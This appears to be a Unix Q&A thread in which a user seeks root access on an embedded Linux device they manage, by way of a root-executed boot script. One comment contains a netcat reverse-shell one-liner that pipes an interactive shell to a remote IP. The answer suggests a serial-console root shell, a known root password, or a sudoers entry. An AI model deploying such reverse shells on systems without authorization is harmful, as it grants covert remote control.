# Use root to create root shell for another user

Tags: shell, tty

I am working with an embedded linux system which has two notable users: root and admin. I can log in via ssh as admin, but not as root (password unknown). The system's manufacturer temporarily opened a security hole which allows me to use the admin user to create a boot script which is executed as root. I want to use this boot script to spawn a root shell which I can connect to later using the user admin. I'm not sure of the terminology, but I think I want to create a virtual tty connected to an interactive shell with permissions set so that admin can open it. I'm at a loss as to what commands to run to make this happen.

Comment: I just found something about connectback shells. But I have a busybox nc that doesn't support the `-l` option

Comment: I thought I could use `mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 >/tmp/f` to connect out from the init script, but as soon as I add an ampersand to make sure the boot script doesn't hang, it fails to connect...

Comment: So there's no way to just reinstall the system with a known password, if you have (physical) access to it?

Comment: I think that you are working hard and not smart. If you need root access, you need to request it from the system amin, even demand it. What you are doing to the system is very dangerous from a network and security perspective. It has the potential to cause more harm than benefit.

Answer (score 1):

> I think I want to create a virtual tty connected to an interactive shell

Well, sure, you can do that — but how are you going to connect to this tty? If you have a serial connection on the device, you can run an interactive shell on it:

```
sh </dev/ttyS0 >/dev/ttyS0 2>/dev/ttyS0
```

There's no login involved, you plug in a serial cable and get a root shell. If you're connecting over SSH, this is less easy, because SSH isn't designed to bypass logging in. Of course you can set a blank password for the root account and configure SSH to authorize root logins.

But that's if what you want is to allow anybody who can connect to the device to run commands as root. If you want to allow the admin user to elevate privileges to root, then involving a terminal makes no sense.

The most straightforward way would be to set a password for the root account that you know. Alternatively, install [sudo](https://www.sudo.ws/) on the device, and add the following line to the file `/etc/sudoers`:

```
admin ALL=(ALL:ALL) ALL
```

Then you can run commands as root from the admin account by running `sudo mycommand` (`sudo -s` to get a shell). If you don't want to have to type the password of the `admin` account when you run `sudo`, add `NOPASSWD:` after the closing parenthesis.

If the root filesystem is read-only, you can install `sudo` elsewhere. The binary must be on a filesystem which is mounted without the `noexec` or `nosuid` options.